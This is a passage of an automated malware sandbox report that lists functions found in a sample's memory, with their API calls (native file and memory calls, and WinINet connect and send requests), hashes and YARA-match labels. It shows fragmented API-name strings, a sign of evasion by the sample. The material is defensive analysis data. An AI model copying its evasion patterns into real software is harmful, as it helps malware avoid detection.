                                                                        • NtReadFile.NTDLL(009B3D62,5E972F59,FFFFFFFF,009B3A21,?,?,009B3D62,?,009B3A21,FFFFFFFF,5E972F59,009B3D62,?,00000000), ref: 009B82C5
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                        • Instruction ID: 84e506eaf2f0ea3941612d8c3a2fb9b18c19fb24cd441221e132251b29a0d36c
                                                                        • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                        • Instruction Fuzzy Hash: FAF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E811CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 009B83B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,009A2D11,00002000,00003000,00000004), ref: 009B83E9
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                        • Instruction ID: 04aeaab6af85e4a00101e63c9d82dfca8f9e6f47502d9ee0fffafdd8056ebd91
                                                                        • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                        • Instruction Fuzzy Hash: 24F015B2200208ABCB14DF89CC81EEB77ADAF8C750F118549BE0897281C630F810CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 009B8300, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtClose.NTDLL(009B3D40,?,?,009B3D40,00000000,FFFFFFFF), ref: 009B8325
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID:
                                                                        • API String ID: 3535843008-0
                                                                        • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                        • Instruction ID: 383fe39bc415e8859a70ebdee986ed6a4886f71656f656a237a6809e5bb3ac46
                                                                        • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                        • Instruction Fuzzy Hash: 3FD012752002186BD710EF98CC45FD7775CEF88760F154455BA185B282C570F90087E0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04C99840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510337881.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true
                                                                        • Associated: 0000000D.00000002.511081583.0000000004D4B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 0000000D.00000002.511116133.0000000004D4F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: cfad1a19b65804c06541443a8872ac0b98d0deed446a81db3ea0d7e95860fd00
                                                                        • Instruction ID: 4d3f7a4bbe6a5a95592986420d543e32e9ad85dde600a630dd0e6d00059ba8b2
                                                                        • Opcode Fuzzy Hash: cfad1a19b65804c06541443a8872ac0b98d0deed446a81db3ea0d7e95860fd00
                                                                        • Instruction Fuzzy Hash: 249002A1242043627545B15944045074117A7E028D7E1C012A1415990C8966E866E661
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04C99860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510337881.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true
                                                                        • Associated: 0000000D.00000002.511081583.0000000004D4B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 0000000D.00000002.511116133.0000000004D4F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: df6f4b9921bf70f5e5653878705ad1f5227a348978d7f82ae9e8b128c2c05ed0
                                                                        • Instruction ID: 23148912c38018e9af9bf58c4b1e51c51429036c9a2a08c7ec551392ae37258c
                                                                        • Opcode Fuzzy Hash: df6f4b9921bf70f5e5653878705ad1f5227a348978d7f82ae9e8b128c2c05ed0
                                                                        • Instruction Fuzzy Hash: BD9002B120100623F11161594504707011B97D028DFE1C412A0425598D9A96D962B161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04C995D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510337881.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true
                                                                        • Associated: 0000000D.00000002.511081583.0000000004D4B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 0000000D.00000002.511116133.0000000004D4F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 35dcb2053976fc2370ef0d35e3836850083cf519e4db4151140e034850ff727f
                                                                        • Instruction ID: ac80f2818a1fda4188c185d925ec0576f98c7e963c602de9545b82b6eb0c1306
                                                                        • Opcode Fuzzy Hash: 35dcb2053976fc2370ef0d35e3836850083cf519e4db4151140e034850ff727f
                                                                        • Instruction Fuzzy Hash: 799002E120200213610571594414616411B97E024DBA1C021E10155D0DC965D8A17165
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04C999A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510337881.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true
                                                                        • Associated: 0000000D.00000002.511081583.0000000004D4B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 0000000D.00000002.511116133.0000000004D4F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: f2c3e5c1374132880504e3ad3181c72c71292133b173a14bab7c3e4f213eca58
                                                                        • Instruction ID: 71077915487ca4632a836647f676a2c53e1b38b5cfe2f67818aae3a19d032a23
                                                                        • Opcode Fuzzy Hash: f2c3e5c1374132880504e3ad3181c72c71292133b173a14bab7c3e4f213eca58
                                                                        • Instruction Fuzzy Hash: CA9002E134100652F10061594414B060117D7E134DFA1C015E1065594D8A59DC627166
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04C99540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510337881.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true
                                                                        • Associated: 0000000D.00000002.511081583.0000000004D4B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 0000000D.00000002.511116133.0000000004D4F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 31aa8d5efba8f97bee4be1518074f3f1226ccc58ed4b1209aebbf8e8e9c46b78
                                                                        • Instruction ID: 5d83952527ce3397d79d72b5a3ec18b430eddc61fa333b9fd0eee04638f9508e
                                                                        • Opcode Fuzzy Hash: 31aa8d5efba8f97bee4be1518074f3f1226ccc58ed4b1209aebbf8e8e9c46b78
                                                                        • Instruction Fuzzy Hash: 659002A5211002132105A5590704507015797D539D3A1C021F1016590CDA61D8716161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04C99910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510337881.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true
                                                                        • Associated: 0000000D.00000002.511081583.0000000004D4B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 0000000D.00000002.511116133.0000000004D4F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: f5c1eb5961c874b20d3b0d9a3558de45640d690078258d018c5022d6abbff09b
                                                                        • Instruction ID: 63b4ea3b68bfade3d93f172e2179a648d69dca7662fb979426209cc038ef7d17
                                                                        • Opcode Fuzzy Hash: f5c1eb5961c874b20d3b0d9a3558de45640d690078258d018c5022d6abbff09b
                                                                        • Instruction Fuzzy Hash: B59002F120100612F14071594404746011797D034DFA1C011A5065594E8A99DDE576A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04C996D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510337881.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true
                                                                        • Associated: 0000000D.00000002.511081583.0000000004D4B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 0000000D.00000002.511116133.0000000004D4F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: e0ed5ca5504b92f25dfa2cb39688a20d8b1fb5abc00607c1470e7c814ab220c9
                                                                        • Instruction ID: 29889c36b4d173f1a3f0b3b4fe934ec613a9014ac78c968f879b1e4ef2a684a0
                                                                        • Opcode Fuzzy Hash: e0ed5ca5504b92f25dfa2cb39688a20d8b1fb5abc00607c1470e7c814ab220c9
                                                                        • Instruction Fuzzy Hash: 139002B120100A52F10061594404B46011797E034DFA1C016A0125694D8A55D8617561
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04C996E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510337881.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true
                                                                        • Associated: 0000000D.00000002.511081583.0000000004D4B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 0000000D.00000002.511116133.0000000004D4F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: cebb59b46bfe7dab900f5cee48dc57f0357719ff1c2fdee6b28f8c5d989c838f
                                                                        • Instruction ID: 932e53da20fabd7a49bb42c7948366fd3dfb05b5be342c2f566c1345edc55819
                                                                        • Opcode Fuzzy Hash: cebb59b46bfe7dab900f5cee48dc57f0357719ff1c2fdee6b28f8c5d989c838f
                                                                        • Instruction Fuzzy Hash: DF9002B120108A12F1106159840474A011797D034DFA5C411A4425698D8AD5D8A17161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04C99A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510337881.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true
                                                                        • Associated: 0000000D.00000002.511081583.0000000004D4B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 0000000D.00000002.511116133.0000000004D4F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 9af999c14dc7f1f818f1dbc3b8334aa1f336cbae434942c0830dcb57254a3c4c
                                                                        • Instruction ID: 0072e6171845b6b5dabd29681e6909c4a1dd44727f78823041bcec11597987fd
                                                                        • Opcode Fuzzy Hash: 9af999c14dc7f1f818f1dbc3b8334aa1f336cbae434942c0830dcb57254a3c4c
                                                                        • Instruction Fuzzy Hash: A99002A121180252F20065694C14B07011797D034FFA1C115A0155594CCD55D8716561
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04C99650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510337881.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true
                                                                        • Associated: 0000000D.00000002.511081583.0000000004D4B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 0000000D.00000002.511116133.0000000004D4F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: c37152cc6250b995434e19b728f860d53e632697b6f939f90512fa719073751f
                                                                        • Instruction ID: 97c8a9d0758ed0c5f317e6d8c2c0b546e9285bd067404f1b74d7f1edf158bbd0
                                                                        • Opcode Fuzzy Hash: c37152cc6250b995434e19b728f860d53e632697b6f939f90512fa719073751f
                                                                        • Instruction Fuzzy Hash: B99002B120504A52F14071594404A46012797D034DFA1C011A00656D4D9A65DD65B6A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04C99660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510337881.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true
                                                                        • Associated: 0000000D.00000002.511081583.0000000004D4B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 0000000D.00000002.511116133.0000000004D4F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 5beaad949d220fd29094187518a45de61484357cfbdccb6cc05948b7322eefe3
                                                                        • Instruction ID: bf985a61a0d1439e6bc7748c2c2376a440669fa79d13f9e0027685fbd155dad6
                                                                        • Opcode Fuzzy Hash: 5beaad949d220fd29094187518a45de61484357cfbdccb6cc05948b7322eefe3
                                                                        • Instruction Fuzzy Hash: 549002B120100A12F1807159440464A011797D134DFE1C015A0026694DCE55DA6977E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04C99FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510337881.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true
                                                                        • Associated: 0000000D.00000002.511081583.0000000004D4B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 0000000D.00000002.511116133.0000000004D4F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 5e52c183c2ed2d6999327bbc80bd9f6628430ead5cd84a512f14883ac9c1ef6f
                                                                        • Instruction ID: 95e50ab4aff33f4d89e1cf7f08c64aee2f17e28c414c74d972386e26d35a1529
                                                                        • Opcode Fuzzy Hash: 5e52c183c2ed2d6999327bbc80bd9f6628430ead5cd84a512f14883ac9c1ef6f
                                                                        • Instruction Fuzzy Hash: 0A9002B131114612F11061598404706011797D124DFA1C411A0825598D8AD5D8A17162
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04C99780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510337881.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true
                                                                        • Associated: 0000000D.00000002.511081583.0000000004D4B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 0000000D.00000002.511116133.0000000004D4F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 658a65661de16e66779edbf4196730aeae87742282942136d37a867a4ceff266
                                                                        • Instruction ID: 28201656ec5571076c3e9f220d6d44094299ecd98bea4e31f89d8bae4208ff6a
                                                                        • Opcode Fuzzy Hash: 658a65661de16e66779edbf4196730aeae87742282942136d37a867a4ceff266
                                                                        • Instruction Fuzzy Hash: 389002A921300212F1807159540860A011797D124EFE1D415A0016598CCD55D8796361
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04C99710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510337881.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true
                                                                        • Associated: 0000000D.00000002.511081583.0000000004D4B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 0000000D.00000002.511116133.0000000004D4F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 5c953b284469490cb80d4bab75eebb5a88f583930055466d838a4319597555ed
                                                                        • Instruction ID: c5f3ce56b9428732868af98e08d5372f1750d3401f2ad1afffa42953451fb8f5
                                                                        • Opcode Fuzzy Hash: 5c953b284469490cb80d4bab75eebb5a88f583930055466d838a4319597555ed
                                                                        • Instruction Fuzzy Hash: AD9002B120100612F10065995408646011797E034DFA1D011A5025595ECAA5D8A17171
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 009B88D6, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 49networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 009B8948
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: HttpOpenRequest
                                                                        • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                                                        • API String ID: 1984915467-4016285707
                                                                        • Opcode ID: 548209069d2490fb62b8ee0c95eead0a48b4b1e8d117a2284ce50345a5e0f91c
                                                                        • Instruction ID: ff8d42e75fd141da6961b223f412e556bc3cd3ae955e1f6135458909ba6f038f
                                                                        • Opcode Fuzzy Hash: 548209069d2490fb62b8ee0c95eead0a48b4b1e8d117a2284ce50345a5e0f91c
                                                                        • Instruction Fuzzy Hash: 0D014CB2905118AFCB04DF88D941EEF7BB9EB88210F158248FD48A7305D631EE11CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 009B88E0, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 48networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 009B8948
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: HttpOpenRequest
                                                                        • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                                                        • API String ID: 1984915467-4016285707
                                                                        • Opcode ID: 6c1eafa3af226a689b846ded80bf8f0a7dd1c2f620c7b46790f01cf217bfb4e9
                                                                        • Instruction ID: acf115320aacf3190e5480634e165775248377df5d4727b4fd6b88af4a457037
                                                                        • Opcode Fuzzy Hash: 6c1eafa3af226a689b846ded80bf8f0a7dd1c2f620c7b46790f01cf217bfb4e9
                                                                        • Instruction Fuzzy Hash: E001E9B2905119AFCB14DF98D941DEF7BBDEB88210F158288FD48A7205D630ED10CBE1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 009B8960, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 42networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 009B89BC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: HttpRequestSend
                                                                        • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                                                        • API String ID: 360639707-2503632690
                                                                        • Opcode ID: 177ccb57ee224b759035b8d17f1308ad0ebf8aeb9cb95bc6b42b40d67c27329b
                                                                        • Instruction ID: 9718460be8cd5d21a27fe5781c7a22236720fbfb9f135327babff20fa8489957
                                                                        • Opcode Fuzzy Hash: 177ccb57ee224b759035b8d17f1308ad0ebf8aeb9cb95bc6b42b40d67c27329b
                                                                        • Instruction Fuzzy Hash: 1B014FB2905118AFCB00DF98D945AFF7BBCEB48210F148189FD08A7204D670EE10CBE1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 009B8957, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 41networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 009B89BC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: HttpRequestSend
                                                                        • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                                                        • API String ID: 360639707-2503632690
                                                                        • Opcode ID: 52ec391f935f9c8049ac92e2fdc19b40a65e0e5907f68e2ea4f78e7a0c382f7a
                                                                        • Instruction ID: c8727492fafd32f8f18c008141ab69d8485c0472d1bb1143421b47c00ab90486
                                                                        • Opcode Fuzzy Hash: 52ec391f935f9c8049ac92e2fdc19b40a65e0e5907f68e2ea4f78e7a0c382f7a
                                                                        • Instruction Fuzzy Hash: 65012CB1909219AFCB04DF88C945AAFBBB9EB58250F158148FD1967205C631AA10CBE1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 009B8855, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 48networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 009B88C8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ConnectInternet
                                                                        • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                                                        • API String ID: 3050416762-1024195942
                                                                        • Opcode ID: 1beb60638bdf1ca002ce1c8661f89acbec1017934f71d690f4d2ae87c7772c7b
                                                                        • Instruction ID: 5b2d2b026f39309da6197ecd484af931dbe83efd3606d5c5ae1bd7d4f8960d8c
                                                                        • Opcode Fuzzy Hash: 1beb60638bdf1ca002ce1c8661f89acbec1017934f71d690f4d2ae87c7772c7b
                                                                        • Instruction Fuzzy Hash: 35011BB2905159AFDB14DF98D981AEF7BBDFB48310F158188FA18A7201D670EE11CBE1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 009B8860, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 48networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 009B88C8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ConnectInternet
                                                                        • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                                                        • API String ID: 3050416762-1024195942
                                                                        • Opcode ID: 7ed34138f7708cf7613383558ca86b8bd00d3c79a0a04dd4c06582688efb1e76
                                                                        • Instruction ID: 40d509f2c2b73dd69f9346b60db2d569ff6a9e034468a6c30af92bbf2e1cc48d
                                                                        • Opcode Fuzzy Hash: 7ed34138f7708cf7613383558ca86b8bd00d3c79a0a04dd4c06582688efb1e76
                                                                        • Instruction Fuzzy Hash: 3D01D7B2905118AFCB14DF99D941EEF77BDEB48310F158289BE08A7241D670EE11CBE1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 009B87F0, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 41networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 009B8847
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: InternetOpen
                                                                        • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                                        • API String ID: 2038078732-3155091674
                                                                        • Opcode ID: 883d24814d1d434d2a1ce25732a84b13edda96a210da1abb7f18c8cad43de92b
                                                                        • Instruction ID: 9954d85f638bb29a8d8ed54a384f810d1afe39c74c3dae82d9685e49527f4e1d
                                                                        • Opcode Fuzzy Hash: 883d24814d1d434d2a1ce25732a84b13edda96a210da1abb7f18c8cad43de92b
                                                                        • Instruction Fuzzy Hash: E8F019B2901118AF8B14DF98DD419EBB7BCEF48310B048589FE18A7201D630AE10CBE1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 009B87E8, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 39networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 009B8847
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: InternetOpen
                                                                        • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                                        • API String ID: 2038078732-3155091674
                                                                        • Opcode ID: b4c08f814941fb355689835392012b3b826060c1c1b5934cdd6bdc96885dda63
                                                                        • Instruction ID: 265514b2b353bb8fe0bfcf38dc48fff010084bc61bf8efc3eedeb9bd003527a5
                                                                        • Opcode Fuzzy Hash: b4c08f814941fb355689835392012b3b826060c1c1b5934cdd6bdc96885dda63
                                                                        • Instruction Fuzzy Hash: 9DF019B2901128AF8B14DF98D9419EB7BBCFF48310B048549FE18AB241D630AA10CBE1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 009B6EF0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Sleep.KERNELBASE(000007D0), ref: 009B6F98
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID: net.dll$wininet.dll
                                                                        • API String ID: 3472027048-1269752229
                                                                        • Opcode ID: 9af03f7d8b8f3cb13721ec944da4d2b0e0be474876f60c5ffa2889f2ab7990b6
                                                                        • Instruction ID: 2b1df0faf9fff206a98b1b4f0a43f38e3dab802d039b9384f21fe0cf115980de
                                                                        • Opcode Fuzzy Hash: 9af03f7d8b8f3cb13721ec944da4d2b0e0be474876f60c5ffa2889f2ab7990b6
